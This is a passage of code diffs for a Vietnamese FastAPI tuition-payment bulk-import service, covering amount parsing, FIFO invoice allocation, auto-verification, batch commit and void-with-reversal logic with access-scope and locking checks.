+            amount = parse_amount_vn(str(row.get(COL_AMOUNT, "")))
+        except ValueError as e:
+            err = str(e)
+        pay_date = None
+        try:
+            pay_date = parse_date_vn(str(row.get(COL_DATE, "")))
+        except ValueError as e:
+            err = err or str(e)
+        method_raw = _norm_name(str(row.get(COL_METHOD, "")))
+        method_code = METHOD_MAP.get(method_raw)
+        if method_code is None:
+            err = err or f"hình thức không hợp lệ: '{row.get(COL_METHOD, '')}'"
+
+        drafts.append(RowDraft(
+            row_no=row_no, citizen_id=cccd, name=name, amount=amount,
+            payment_date=pay_date, method_code=method_code, reference=ref,
+            note=note, raw=raw, parse_error=err,
+        ))
+    return drafts
+
+
+# ---------------------------------------------------------------------------
+# Resolve + validate (READ-ONLY — không ghi Payment)
+# ---------------------------------------------------------------------------
+async def resolve_and_validate(
+    db: AsyncSession,
+    drafts: List[RowDraft],
+    academic_year: int,
+    semester_no: int,
+    unit_id: Optional[int],
+) -> PreviewResult:
+    """Đối chiếu từng dòng → MATCHED/WARNING/ERROR. KHÔNG ghi gì.
+
+    - khóa = CCCD + academic_year (unique) + IDOR unit-scope
+    - fee tuition kỳ S, status NOT IN (cancelled, waived)
+    - FIFO principal-first: principal_remaining = invoice.amount - paid (KHÔNG
+      remaining_amount vì gồm penalty)
+    - sổ phân bổ in-batch per-invoice → chống double-alloc khi 2 dòng cùng CCCD+kỳ
+    """
+    # Sổ phân bổ trong batch: invoice_id -> tổng đã phân bổ ở các dòng TRƯỚC.
+    batch_alloc: Dict[int, Decimal] = {}
+    results: List[RowResult] = []
+
+    for d in drafts:
+        res = RowResult(
+            row_no=d.row_no, status=PaymentImportRowStatusEnum.error.value,
+            citizen_id=d.citizen_id, amount=d.amount, method_code=d.method_code,
+            payment_date=d.payment_date, reference=d.reference or None, raw=d.raw,
+        )
+
+        # (0) lỗi parse
+        if d.parse_error:
+            res.message = d.parse_error
+            results.append(res)
+            continue
+        # (6) CCCD định dạng
+        if not CCCD_RE.match(d.citizen_id):
+            res.message = (
+                "CCCD phải đúng 12 chữ số" if d.citizen_id
+                else "thiếu CCCD")
+            results.append(res)
+            continue
+
+        # (2/6) hồ sơ theo CCCD + năm + IDOR unit-scope
+        profile = await _resolve_profile(db, d.citizen_id, academic_year, unit_id)
+        if profile is None:
+            res.message = f"không tìm thấy hồ sơ CCCD {d.citizen_id} (năm {academic_year})"
+            results.append(res)
+            continue
+        res.profile_id = profile.id
+
+        # (3) học phí kỳ S, active-only
+        fee = await _resolve_tuition_fee(db, profile.id, semester_no, unit_id)
+        if fee is None:
+            res.message = f"không có học phí HK{semester_no} đang hiệu lực"
+            results.append(res)
+            continue
+        res.fee_id = fee.id
+
+        # (4/5) phân bổ FIFO principal-first, trừ sổ in-batch
+        warnings: List[str] = []
+        invoices = await _payable_invoices(db, fee.id, unit_id)
+        if not invoices:
+            res.message = "chưa phát hành hóa đơn (đợt còn nháp) hoặc đã thu đủ"
+            results.append(res)
+            continue
+
+        remaining_total = Decimal("0")
+        avail: List[tuple] = []  # (invoice, available_principal)
+        for inv in invoices:
+            principal_rem = (inv.amount or Decimal("0")) - (inv.paid_amount or Decimal("0"))
+            principal_rem -= batch_alloc.get(inv.id, Decimal("0"))
+            if principal_rem < 0:
+                principal_rem = Decimal("0")
+            avail.append((inv, principal_rem))
+            remaining_total += principal_rem
+
+        if d.amount > remaining_total:
+            res.message = (
+                f"thu {_money(d.amount)} vượt tổng còn nợ gốc HK{semester_no} "
+                f"({_money(remaining_total)})")
+            results.append(res)
+            continue
+
+        # cross-check tên (warning)
+        if d.name and _norm_name(d.name) != _norm_name(profile.lead.full_name if profile.lead else ""):
+            warnings.append(
+                f"tên lệch: file '{d.name}' vs hồ sơ "
+                f"'{profile.lead.full_name if profile.lead else ''}'")
+
+        # FIFO allocate
+        left = d.amount
+        for inv, principal_rem in avail:
+            if left <= 0:
+                break
+            if principal_rem <= 0:
+                continue
+            take = min(left, principal_rem)
+            res.allocations.append(
+                Allocation(invoice_id=inv.id, installment_no=inv.installment_no, amount=take))
+            batch_alloc[inv.id] = batch_alloc.get(inv.id, Decimal("0")) + take
+            left -= take
+
+        if len(res.allocations) > 1:
+            warnings.append(f"thu phân bổ {len(res.allocations)} đợt")
+
+        if warnings:
+            res.status = PaymentImportRowStatusEnum.warned.value
+            res.message = " · ".join(warnings)
+        else:
+            res.status = PaymentImportRowStatusEnum.matched.value
+        results.append(res)
+
+    matched = sum(1 for r in results if r.status == PaymentImportRowStatusEnum.matched.value)
+    warned = sum(1 for r in results if r.status == PaymentImportRowStatusEnum.warned.value)
+    failed = sum(1 for r in results if r.status == PaymentImportRowStatusEnum.error.value)
+    total = sum(
+        (r.amount or Decimal("0")) for r in results
+        if r.status != PaymentImportRowStatusEnum.error.value)
+    return PreviewResult(
+        rows=results, matched_count=matched, warned_count=warned,
+        failed_count=failed, total_amount=total)
+
+
+async def _resolve_profile(
+    db: AsyncSession, citizen_id: str, academic_year: int, unit_id: Optional[int],
+) -> Optional[models.AdmissionProfile]:
+    """CCCD + năm → hồ sơ (unique), IDOR unit-scope, eager lead cho cross-check tên."""
+    from sqlalchemy.orm import selectinload
+    stmt = (
+        select(models.AdmissionProfile)
+        .join(models.Lead)
+        .options(selectinload(models.AdmissionProfile.lead))
+        .where(
+            models.AdmissionProfile.citizen_id == citizen_id,
+            models.AdmissionProfile.academic_year == academic_year,
+        )
+    )
+    if unit_id is not None:
+        stmt = stmt.where(models.Lead.unit_id == unit_id)
+    return (await db.execute(stmt)).scalar_one_or_none()
+
+
+async def _resolve_tuition_fee(
+    db: AsyncSession, profile_id: int, semester_no: int, unit_id: Optional[int],
+) -> Optional[Fee]:
+    """Học phí (tuition) kỳ S, status active (NOT cancelled/waived)."""
+    stmt = (
+        select(Fee)
+        .where(
+            Fee.admission_profile_id == profile_id,
+            Fee.fee_type == "tuition",
+            Fee.semester_no == semester_no,
+            Fee.status.notin_(
+                [FeeStatusEnum.cancelled.value, FeeStatusEnum.waived.value]),
+        )
+    )
+    return (await db.execute(stmt)).scalars().first()
+
+
+async def _payable_invoices(
+    db: AsyncSession, fee_id: int, unit_id: Optional[int],
+) -> List[Invoice]:
+    """Đợt PAYABLE (issued/partial/overdue) sắp theo installment_no."""
+    stmt = (
+        select(Invoice)
+        .where(
+            Invoice.fee_id == fee_id,
+            Invoice.status.in_(list(PAYABLE_INVOICE_STATUSES)),
+        )
+        .order_by(Invoice.installment_no)
+    )
+    return list((await db.execute(stmt)).scalars().all())
+
+
+def _money(v: Decimal) -> str:
+    return f"{v:,.0f}".replace(",", ".")

--- a/Backend_FastAPI/app/services/payment_import_service.py
+++ b/Backend_FastAPI/app/services/payment_import_service.py
@@ -39,6 +39,7 @@ from app.models.finance import (
     Fee,
     Invoice,
     FeeStatusEnum,
+    InvoiceStatusEnum,
     PAYABLE_INVOICE_STATUSES,
     Payment,
     PaymentImportBatch,
@@ -48,6 +49,8 @@ from app.models.finance import (
     PaymentMethod,
     PaymentStatusEnum,
     PaymentTransaction,
+    RefundRequest,
+    RefundStatusEnum,
     TransactionTypeEnum,
 )
 from app.repositories.fee_repository import FeeRepository, InvoiceRepository
@@ -1259,6 +1262,219 @@ async def commit_batch(
         # Lead-sync (projection) đã làm trong body. Nếu sau cần báo phụ huynh: thêm 1
         # notif GỘP per-hồ-sơ + PHẢI seed notification_rule (nếu không sẽ fire-zero
         # theo fail-closed dispatcher). Để trống là CỐ Ý, không phải thiếu sót.
+        return None
+
+    return result, post_commit
+
+
+# ---------------------------------------------------------------------------
+# BV-3.5 — Void (đảo) lô đã committed: rút lại tiền + mở lại file để re-import
+# ---------------------------------------------------------------------------
+@dataclass
+class VoidResult:
+    batch_id: int
+    reversed_count: int  # số Payment đã đảo (rút lại)
+    reversed_amount: Decimal  # tổng tiền đã rút
+
+
+async def void_batch(
+    db: AsyncSession,
+    *,
+    batch_id: int,
+    user_id: int,
+    unit_id: Optional[int],
+    reason: str,
+) -> Tuple[VoidResult, Callable]:
+    """Đảo (void) 1 lô đã ``committed`` — rút lại MỌI Payment bulk đã ghi.
+
+    Mỗi Payment 'verified' của lô → reverse invoice/fee.paid_amount (về 'issued' nếu
+    hết, 'partial' nếu còn) + ``PaymentTransaction(type=reversal, amount âm)`` +
+    Payment → 'refunded' (constraint chỉ có refunded; ``type=reversal`` phân biệt với
+    customer-refund ở ledger). Batch → 'void' → file_sha256 thoát partial-unique →
+    re-import được.
+
+    ATOMIC (KHÔNG savepoint per-row): void phải đảo TRỌN lô — 1 lỗi → rollback cả
+    (router get_db không commit). Lock TẤT CẢ invoice (asc id) RỒI fee (asc id) —
+    khớp lock-order invoice→fee, tránh deadlock ABBA với verify/commit đồng thời.
+
+    ⚠️ KHÔNG tự đảo lead-status (sts10→cũ): projection 1 chiều, không lưu status cũ
+    → điều chỉnh lead thủ công nếu cần (void là thao tác kế toán hiếm).
+    """
+    from app.services.payment_service import reverse_payment_balances
+
+    batch = (
+        await db.execute(
+            select(PaymentImportBatch)
+            .where(PaymentImportBatch.id == batch_id)
+            .with_for_update()
+        )
+    ).scalar_one_or_none()
+    if batch is None:
+        raise ResourceNotFoundError("Không tìm thấy lô import")
+    # IDOR: void unit-scope theo đơn vị NGƯỜI TẠO (khớp commit/list). manager unit-
+    # scope; admin (unit_id=None) → mọi lô. accountant bị Casbin chặn (void=mgr/admin).
+    if unit_id is not None:
+        creator_unit = (
+            await db.execute(
+                select(models.User.unit_id).where(
+                    models.User.id == batch.created_by_id
+                )
+            )
+        ).scalar_one_or_none()
+        if creator_unit != unit_id:
+            raise ResourceNotFoundError("Không tìm thấy lô import")
+    if batch.status != PaymentImportBatchStatusEnum.committed.value:
+        raise ConflictError(
+            f"Chỉ đảo (void) được lô đã committed (hiện: {batch.status})"
+        )
+
+    fee_repo = FeeRepository(db)
+    inv_repo = InvoiceRepository(db)
+
+    rows = list(
+        (
+            await db.execute(
+                select(PaymentImportRow).where(PaymentImportRow.batch_id == batch_id)
+            )
+        )
+        .scalars()
+        .all()
+    )
+    payment_ids = sorted({pid for r in rows for pid in (r.payment_ids or [])})
+    # Lock Payment rows FOR UPDATE (asc id) TRƯỚC khi check refund + đảo — serialize
+    # với refund-creation (request_refund cũng khóa Payment, of=Payment): refund tạo
+    # đồng thời phải CHỜ → sau void thấy status='refunded' → bị chặn (chỉ refund
+    # 'verified'). order_by(id) cho thứ tự khóa xác định (chống void↔void deadlock).
+    payments = (
+        list(
+            (
+                await db.execute(
+                    select(Payment)
+                    .where(Payment.id.in_(payment_ids))
+                    .order_by(Payment.id)
+                    .with_for_update()
+                )
+            )
+            .scalars()
+            .all()
+        )
+        if payment_ids
+        else []
+    )
+
+    # Lock TẤT CẢ invoice (asc id) RỒI TẤT CẢ fee (asc id) — deadlock-safe (không giữ
+    # khóa fee khi đi xin khóa invoice). KHÔNG db.refresh: void không pre-load (Payment.
+    # invoice lazy='select') nên get_for_update là lần nạp ĐẦU → cột đã tươi.
+    invoice_ids = sorted({p.invoice_id for p in payments})
+    inv_by_id: Dict[int, Invoice] = {}
+    for iid in invoice_ids:
+        li = await inv_repo.get_for_update(iid, unit_id)
+        if li is None:
+            raise BusinessRuleViolation(
+                f"không khóa được hóa đơn #{iid} (IDOR / đã đổi)"
+            )
+        inv_by_id[iid] = li
+    fee_ids = sorted({inv.fee_id for inv in inv_by_id.values()})
+    fee_by_id: Dict[int, Fee] = {}
+    for fid in fee_ids:
+        lf = await fee_repo.get_for_update(fid, unit_id)
+        if lf is None:
+            raise BusinessRuleViolation(f"không khóa được học phí #{fid}")
+        fee_by_id[fid] = lf
+
+    # (#3) Guard out-of-band: invoice/fee bị HỦY/MIỄN giữa commit→void (vd luồng gộp
+    # đợt SQL) → KHÔNG resurrect (reverse_payment_balances set 'issued'/'partial' vô
+    # điều kiện → hồi sinh hóa đơn đã hủy / IntegrityError). Refuse → xử lý thủ công.
+    for inv in inv_by_id.values():
+        if inv.status == InvoiceStatusEnum.cancelled.value:
+            raise BusinessRuleViolation(
+                f"hóa đơn #{inv.id} đã bị hủy giữa commit→void — xử lý thủ công"
+            )
+    for fee in fee_by_id.values():
+        if fee.status in (
+            FeeStatusEnum.cancelled.value,
+            FeeStatusEnum.waived.value,
+        ):
+            raise BusinessRuleViolation(
+                f"học phí #{fee.id} đã {fee.status} giữa commit→void — xử lý thủ công"
+            )
+
+    # (P1) Guard refund: payment trong lô đã/đang được hoàn lẻ (RefundRequest non-
+    # rejected) → KHÔNG đảo (trừ tiền 2 LẦN — refund đã rút phần đó). Dưới khóa fee nên
+    # refund-processing đồng thời (cũng khóa fee) bị serialize. Khe tạo refund SAU check
+    # bị chặn bởi guard payment.status='verified' ở process_approved_refund.
+    if payment_ids:
+        live_refund = (
+            await db.execute(
+                select(RefundRequest.id)
+                .where(
+                    RefundRequest.payment_id.in_(payment_ids),
+                    RefundRequest.status != RefundStatusEnum.rejected.value,
+                )
+                .limit(1)
+            )
+        ).scalar_one_or_none()
+        if live_refund is not None:
+            raise ConflictError(
+                "Lô có payment đã/đang được hoàn tiền (refund) — xử lý refund "
+                "trước khi đảo lô"
+            )
+
+    now = datetime.now(timezone.utc)
+    reversed_count = 0
+    reversed_amount = Decimal("0")
+    for p in payments:
+        # Idempotent: Payment đã 'refunded' (đã đảo/hoàn lẻ trước) → bỏ qua (không
+        # đảo 2 lần).
+        if p.status != PaymentStatusEnum.verified.value:
+            continue
+        inv = inv_by_id.get(p.invoice_id)
+        fee = fee_by_id.get(inv.fee_id) if inv is not None else None
+        if inv is None or fee is None:
+            raise BusinessRuleViolation(f"thiếu hóa đơn/học phí cho payment #{p.id}")
+        bal_before, fee_remaining = reverse_payment_balances(
+            invoice=inv, fee=fee, amount=p.amount
+        )
+        p.status = PaymentStatusEnum.refunded.value
+        db.add(
+            PaymentTransaction(
+                payment_id=p.id,
+                fee_id=fee.id,
+                transaction_type=TransactionTypeEnum.reversal.value,
+                amount=-p.amount,
+                balance_before=bal_before,
+                balance_after=fee_remaining,
+                external_reference=p.reference_code,
+                gateway_response={
+                    "verification_mode": "bulk_void",
+                    "batch_id": batch_id,
+                    "voided_by_id": user_id,
+                },
+                idempotency_key=f"bulkvoid:{batch_id}:{p.id}",
+                performed_by_id=user_id,
+                notes=f"Void lô import #{batch_id}. Lý do: {reason}"[:1000],
+            )
+        )
+        reversed_count += 1
+        reversed_amount += p.amount
+
+    batch.status = PaymentImportBatchStatusEnum.void.value
+    batch.voided_at = now
+    batch.void_reason = (reason or "")[:1000]
+    # (#4) Lịch sử lô phản ánh tiền THỰC còn lại = đã thu − đã đảo (full void → 0),
+    # tránh batch 'void' vẫn hiện total như còn thu đủ.
+    batch.total_amount = batch.total_amount - reversed_amount
+    if batch.total_amount < Decimal("0"):
+        batch.total_amount = Decimal("0")
+    await db.flush()
+
+    result = VoidResult(
+        batch_id=batch_id,
+        reversed_count=reversed_count,
+        reversed_amount=reversed_amount,
+    )
+
+    async def post_commit() -> None:
         return None
 
     return result, post_commit

--- a/Backend_FastAPI/app/services/payment_import_service.py
+++ b/Backend_FastAPI/app/services/payment_import_service.py
@@ -23,29 +23,40 @@ import io
 import re
 import unicodedata
 from dataclasses import dataclass, field
-from datetime import date, datetime
+from datetime import date, datetime, timezone
 from decimal import Decimal, InvalidOperation, ROUND_HALF_UP
-from typing import Dict, List, Optional, Tuple
+from typing import Callable, Dict, List, Optional, Tuple
 
 import pandas as pd
 import structlog
-from sqlalchemy import select
+from sqlalchemy import func, select
 from sqlalchemy.exc import IntegrityError
 from sqlalchemy.ext.asyncio import AsyncSession
 
 from app import models
+from app.core.constants import UserRole
 from app.models.finance import (
     Fee,
     Invoice,
     FeeStatusEnum,
     PAYABLE_INVOICE_STATUSES,
+    Payment,
     PaymentImportBatch,
     PaymentImportRow,
     PaymentImportBatchStatusEnum,
     PaymentImportRowStatusEnum,
+    PaymentMethod,
+    PaymentStatusEnum,
+    PaymentTransaction,
+    TransactionTypeEnum,
 )
-from app.utils.csv_helpers import sanitize_csv_cell
-from app.utils.exceptions import BadRequest, ConflictError
+from app.repositories.fee_repository import FeeRepository, InvoiceRepository
+from app.utils.exceptions import (
+    BadRequest,
+    BusinessRuleViolation,
+    ConflictError,
+    ResourceNotFoundError,
+)
 
 log = structlog.get_logger(__name__)
 
@@ -85,6 +96,13 @@ METHOD_MAP = {
 
 CCCD_RE = re.compile(r"^\d{12}$")
 MAX_IMPORT_ROWS = 5000
+# Trần 1 khoản = max cột Numeric(15,2). Chặn ở parser để số quá lớn KHÔNG lọt
+# xuống INSERT (payment_import_row.amount / Payment.amount) → DataError → 500.
+MAX_AMOUNT = Decimal("9999999999999.99")
+# Mã tham chiếu lưu vào Payment.reference_code / PaymentTransaction.external_reference
+# = String(100). Ref dài hơn → DataError ở flush → 500 không bắt → chặn sớm thành
+# lỗi dòng sạch.
+MAX_REF_LEN = 100
 
 
 # ---------------------------------------------------------------------------
@@ -154,6 +172,17 @@ def _norm_name(s: Optional[str]) -> str:
     return " ".join(s.lower().split())
 
 
+def _check_thousands_groups(int_groups: List[str], raw: str) -> None:
+    """Xác thực nhóm phân cách nghìn của PHẦN NGUYÊN: nhóm đầu 1-3 chữ số, các nhóm
+    sau ĐÚNG 3. Chặn '1.23.456' / '1,23,456' (nhóm giữa sai) bị nối thầm thành số."""
+    if not (
+        int_groups
+        and 1 <= len(int_groups[0]) <= 3
+        and all(len(g) == 3 for g in int_groups[1:])
+    ):
+        raise ValueError(f"số tiền không hợp lệ: '{raw}'")
+
+
 def parse_amount_vn(raw: str) -> Decimal:
     """Parse số tiền kiểu VN. '.' = phân cách nghìn, ',' = thập phân.
 
@@ -166,10 +195,24 @@ def parse_amount_vn(raw: str) -> Decimal:
     s = re.sub(r"\s", "", _norm(raw))
     if not s:
         raise ValueError("trống")
-    if "," in s:  # ',' = thập phân VN
-        s = s.replace(".", "").replace(",", ".")
-    elif "." in s:  # '.' nhập nhằng
+    has_dot = "." in s
+    has_comma = "," in s
+    if has_dot and has_comma:
+        if s.rfind(",") > s.rfind("."):  # ',' bên phải = thập phân (VN 7.200.000,50)
+            _check_thousands_groups(s.split(",")[0].split("."), raw)
+            s = s.replace(".", "").replace(",", ".")
+        else:  # '.' bên phải = thập phân (US 7,200,000.00)
+            _check_thousands_groups(s.split(".")[0].split(","), raw)
+            s = s.replace(",", "")
+    elif has_comma:
+        if s.count(",") > 1:  # nhiều ',' = phân cách nghìn (US 7,200,000)
+            _check_thousands_groups(s.split(","), raw)
+            s = s.replace(",", "")
+        else:  # 1 dấu ',' = thập phân VN (7,50)
+            s = s.replace(",", ".")
+    elif has_dot:  # '.' nhập nhằng
         if len(s.rsplit(".", 1)[1]) == 3:  # nhóm cuối 3 chữ số -> nghìn
+            _check_thousands_groups(s.split("."), raw)
             s = s.replace(".", "")
         # else: '.' là thập phân (float string) -> giữ nguyên
     try:
@@ -181,6 +224,8 @@ def parse_amount_vn(raw: str) -> Decimal:
     val = val.quantize(Decimal("0.01"), rounding=ROUND_HALF_UP)
     if val <= 0:
         raise ValueError("số tiền phải > 0")
+    if val > MAX_AMOUNT:  # chặn tràn cột Numeric(15,2) → DataError/500 ở pha persist
+        raise ValueError(f"số tiền vượt giới hạn cho phép ({_money(MAX_AMOUNT)} đ)")
     return val
 
 
@@ -225,12 +270,37 @@ def parse_template(content: bytes, filename: str) -> List[RowDraft]:
     try:
         if ext == "csv":
             df = pd.read_csv(io.BytesIO(content), dtype=str)
+            df.columns = [str(c).strip() for c in df.columns]
         else:
-            df = pd.read_excel(io.BytesIO(content), engine="openpyxl", dtype=str)
+            # Đọc MỌI sheet rồi chọn sheet ĐẦU TIÊN đủ cột bắt buộc — tránh chỉ đọc
+            # sheet 0 (im lặng bỏ data khi nằm ở sheet sau, sau sheet "Hướng dẫn").
+            sheets = pd.read_excel(
+                io.BytesIO(content), engine="openpyxl", dtype=str, sheet_name=None
+            )
+            df = None
+            for sheet_df in sheets.values():
+                sheet_df.columns = [str(c).strip() for c in sheet_df.columns]
+                if all(c in sheet_df.columns for c in REQUIRED_COLS):
+                    df = sheet_df
+                    break
+            if df is None:  # không sheet nào đủ cột → lấy sheet đầu để báo lỗi cột
+                df = next(iter(sheets.values()), pd.DataFrame())
     except Exception as exc:  # noqa: BLE001
         raise BadRequest(f"Không đọc được file: {exc}")
 
     df = df.fillna("")
+    # Header hay thừa khoảng trắng (' '/' ') → strip để không trượt so khớp
+    # cột bắt buộc rồi từ chối nhầm cả file (CSV đã strip ở trên; lặp lại vô hại).
+    df.columns = [str(c).strip() for c in df.columns]
+    # Strip có thể làm 2 cột khác nhau (vd 'Số CCCD' và 'Số CCCD ') TRÙNG tên →
+    # row.get(col) trả pandas Series → rác vào amount/CCCD/raw. Từ chối rõ ràng thay
+    # vì âm thầm parse sai (file cột trùng = nhập nhằng, kế toán phải sửa).
+    _cols = list(df.columns)
+    _dups = sorted({c for c in _cols if _cols.count(c) > 1})
+    if _dups:
+        raise BadRequest(
+            f"File có cột trùng tên (sau khi bỏ khoảng trắng): {', '.join(_dups)}"
+        )
     missing = [c for c in REQUIRED_COLS if c not in df.columns]
     if missing:
         raise BadRequest(f"File thiếu cột bắt buộc: {', '.join(missing)}")
@@ -250,7 +320,10 @@ def parse_template(content: bytes, filename: str) -> List[RowDraft]:
         # false-error "thiếu CCCD" hàng loạt.
         if not any(cells.values()):
             continue
-        raw = {c: sanitize_csv_cell(row.get(c, "")) for c in df.columns}
+        # raw = giá trị gốc (đã chuẩn hóa chuỗi) cho audit + pha commit re-parse.
+        # KHÔNG sanitize-CSV ở ingest: sanitize là việc của tầng EXPORT — làm ở đây
+        # sẽ chèn dấu ' vào reference/method → lệch preview vs tiền THỰC ghi (BV-3).
+        raw = dict(cells)
         cccd = cells.get(COL_CCCD, "")
         name = cells.get(COL_NAME, "")
         ref = cells.get(COL_REF, "")
@@ -271,6 +344,9 @@ def parse_template(content: bytes, filename: str) -> List[RowDraft]:
         method_code = METHOD_MAP.get(method_raw)
         if method_code is None:
             err = err or f"hình thức không hợp lệ: '{row.get(COL_METHOD, '')}'"
+        # Ref dài hơn cột String(100) → DataError ở commit → 500. Chặn sớm = lỗi dòng.
+        if len(ref) > MAX_REF_LEN:
+            err = err or f"mã tham chiếu quá dài (tối đa {MAX_REF_LEN} ký tự)"
 
         drafts.append(
             RowDraft(
@@ -399,6 +475,14 @@ async def resolve_and_validate(
             warnings.append(
                 f"tên lệch: file '{d.name}' vs hồ sơ "
                 f"'{profile.lead.full_name if profile.lead else ''}'"
+            )
+
+        # cảnh báo ngày thu lệch xa năm học (gõ nhầm năm '2027' thay '2026', hoặc
+        # nhầm dd/mm vs mm/dd) — surface ở preview để kế toán soát, KHÔNG chặn cứng
+        # (thu sớm/muộn trong khoảng [năm học, +1] là hợp lệ).
+        if d.payment_date and abs(d.payment_date.year - academic_year) > 1:
+            warnings.append(
+                f"ngày thu {d.payment_date:%d/%m/%Y} lệch xa năm học {academic_year}"
             )
 
         # FIFO allocate
@@ -730,3 +814,514 @@ def build_template(fmt: str) -> Tuple[bytes, str, str]:
     out = io.BytesIO()
     wb.save(out)
     return out.getvalue(), _XLSX_MEDIA, "mau_import_thu_hoc_phi.xlsx"
+
+
+# ---------------------------------------------------------------------------
+# BV-3 — Ghi tiền (auto-verify) + commit lô
+#
+# ``get_system_user`` + ``auto_verify_payment`` là GENERIC (đặt tạm ở đây; tách sang
+# payment_service.py khi refactor lệ-phí dùng chung — plan §8). auto_verify KHÔNG
+# dispatch notification / lead-sync → ``commit_batch`` GỘP 1 lần/hồ-sơ (tránh fan-out
+# 3N của verify_payment per-row).
+# ---------------------------------------------------------------------------
+async def get_system_user(db: AsyncSession) -> "models.User":
+    """Tài khoản kỹ thuật 'system' (checker cho auto-verify by policy).
+
+    Fingerprint-validated (khớp ``_get_system_application_fee_user`` admission_service):
+    username='system', status='inactive', role=user, email='system@qlts.internal',
+    unit_id=None. Maker-checker thỏa vì importer (kế toán) ≠ system_user (DB constraint
+    ``chk_payment_no_self_approval``).
+    """
+    user = (
+        await db.execute(select(models.User).where(models.User.username == "system"))
+    ).scalar_one_or_none()
+    if user is None:
+        raise ConflictError("Tài khoản kỹ thuật 'system' chưa được cấu hình")
+    # Fingerprint KHỚP ``_get_system_application_fee_user`` (admission_service): thêm
+    # current_assignment_id IS NULL + password là bcrypt thật → không nhận nhầm 1 tài
+    # khoản 'system' bị hạ cấp/chiếm dụng làm checker maker-checker.
+    if not (
+        user.status == "inactive"
+        and user.role == UserRole.USER
+        and user.email == "system@qlts.internal"
+        and user.unit_id is None
+        and user.current_assignment_id is None
+        # bcrypt thật = prefix $2a/$2b/$2y VÀ đủ dài (khớp _is_bcrypt_hash len>=50;
+        # tránh nhận '$2b$' cụt làm hợp lệ).
+        and len(user.password_hash or "") >= 50
+        and (user.password_hash or "").startswith(("$2a$", "$2b$", "$2y$"))
+    ):
+        raise ConflictError("Tài khoản kỹ thuật 'system' sai fingerprint")
+    return user
+
+
+async def auto_verify_payment(
+    db: AsyncSession,
+    *,
+    invoice: Invoice,
+    fee: Fee,
+    method_id: int,
+    amount: Decimal,
+    payment_date: datetime,
+    reference: Optional[str],
+    importer_id: int,
+    system_user: "models.User",
+    idempotency_key: str,
+) -> Optional[Payment]:
+    """Tạo Payment 'verified' (maker=importer, checker=system_user) áp vào ``invoice``
+    ĐÃ TỒN TẠI + cập nhật invoice/fee + PaymentTransaction (audit, neo idempotency).
+
+    Replicate money-math của ``verify_payment`` (payment_service.py:296-335) nhưng tạo
+    Payment verified NGAY (không từ pending) và KHÔNG dispatch/lead-sync. Idempotent:
+    idempotency_key đã có → trả ``None`` (re-commit an toàn).
+
+    ⚠️ Caller PHẢI đã get_for_update + refresh ``invoice`` rồi ``fee`` (lock order
+    invoice→fee, khớp verify_payment → tránh deadlock).
+    """
+    dup = (
+        await db.execute(
+            select(PaymentTransaction.id).where(
+                PaymentTransaction.idempotency_key == idempotency_key
+            )
+        )
+    ).scalar_one_or_none()
+    if dup is not None:
+        return None
+
+    now = datetime.now(timezone.utc)
+    payment = Payment(
+        invoice_id=invoice.id,
+        method_id=method_id,
+        amount=amount,
+        reference_code=reference,
+        status=PaymentStatusEnum.verified.value,
+        payment_date=payment_date,
+        verified_at=now,
+        created_by_id=importer_id,
+        verified_by_id=system_user.id,
+        intent_id=None,
+        notes="Bulk import thu học phí — auto-verify (system_user)",
+    )
+    db.add(payment)
+    await db.flush()
+
+    # Money-math GỐC = verify_payment (1 nguồn sự thật chung, tránh 2 đường ghi tiền
+    # trôi dạt). is_fully_paid GỒM penalty → trả đủ GỐC nhưng còn phạt thì 'partial'.
+    from app.services.payment_service import apply_verified_payment_balances
+
+    fee_balance_before, fee_remaining = apply_verified_payment_balances(
+        invoice=invoice, fee=fee, amount=amount, now=now
+    )
+
+    db.add(
+        PaymentTransaction(
+            payment_id=payment.id,
+            fee_id=fee.id,
+            transaction_type=TransactionTypeEnum.payment.value,
+            amount=amount,
+            balance_before=fee_balance_before,
+            balance_after=fee_remaining,
+            external_reference=reference,
+            gateway_response={
+                "verification_mode": "bulk_import",
+                "idempotency_key": idempotency_key,
+                "importer_id": importer_id,
+                "verified_by_id": system_user.id,
+            },
+            idempotency_key=idempotency_key,
+            performed_by_id=system_user.id,
+            notes=f"Bulk import payment. Invoice: {invoice.invoice_number}",
+        )
+    )
+    await db.flush()
+    return payment
+
+
+async def _load_profile_with_lead(
+    db: AsyncSession, profile_id: int
+) -> "Optional[models.AdmissionProfile]":
+    from sqlalchemy.orm import selectinload
+
+    return (
+        await db.execute(
+            select(models.AdmissionProfile)
+            .options(selectinload(models.AdmissionProfile.lead))
+            .where(models.AdmissionProfile.id == profile_id)
+        )
+    ).scalar_one_or_none()
+
+
+@dataclass
+class CommitResult:
+    batch_id: int
+    committed_count: int  # số dòng ghi được
+    failed_count: int  # số dòng lỗi tại commit (TOCTOU/đổi số dư)
+    payment_count: int  # tổng Payment tạo
+    total_amount: Decimal  # tổng tiền đã ghi
+
+
+async def commit_batch(
+    db: AsyncSession,
+    *,
+    batch_id: int,
+    importer_id: int,
+    unit_id: Optional[int],
+) -> Tuple[CommitResult, Callable]:
+    """Pha 2 — GHI TIỀN. RE-VALIDATE TOCTOU dưới khóa + savepoint per-row + idempotency
+    + GỘP lead-sync 1 lần/hồ-sơ. Trả ``(CommitResult, post_commit)``.
+
+    - Khóa lô (FOR UPDATE) → serialize commit đồng thời cùng lô.
+    - Lock order invoice→fee (khớp verify_payment → tránh deadlock với verify tay).
+    - KHÔNG dùng snapshot preview để ghi: re-fetch fee/invoice HIỆN TẠI (số dư có thể
+      đổi giữa preview→commit). Cuối vòng còn ``left>0`` = vượt nợ hiện tại → raise →
+      savepoint rollback CẢ dòng (không ghi nửa vời).
+    - 1 dòng lỗi không abort cả lô (savepoint per-row).
+    """
+    from app.services.fee_calculation_service import is_hk1_cleared
+    from app.services.lead_admission_sync import sync_lead_tuition_paid
+
+    batch = (
+        await db.execute(
+            select(PaymentImportBatch)
+            .where(PaymentImportBatch.id == batch_id)
+            .with_for_update()
+        )
+    ).scalar_one_or_none()
+    if batch is None:
+        raise ResourceNotFoundError("Không tìm thấy lô import")
+    # P1 IDOR: committer unit-scope (manager) chỉ commit lô do user CÙNG ĐƠN VỊ tạo;
+    # admin/accountant (unit_id=None) → commit mọi lô. Chặn manager commit/poison lô
+    # đơn vị khác → 404 (không lộ tồn tại).
+    if unit_id is not None:
+        creator_unit = (
+            await db.execute(
+                select(models.User.unit_id).where(models.User.id == batch.created_by_id)
+            )
+        ).scalar_one_or_none()
+        if creator_unit != unit_id:
+            raise ResourceNotFoundError("Không tìm thấy lô import")
+    if batch.status != PaymentImportBatchStatusEnum.preview.value:
+        raise ConflictError(
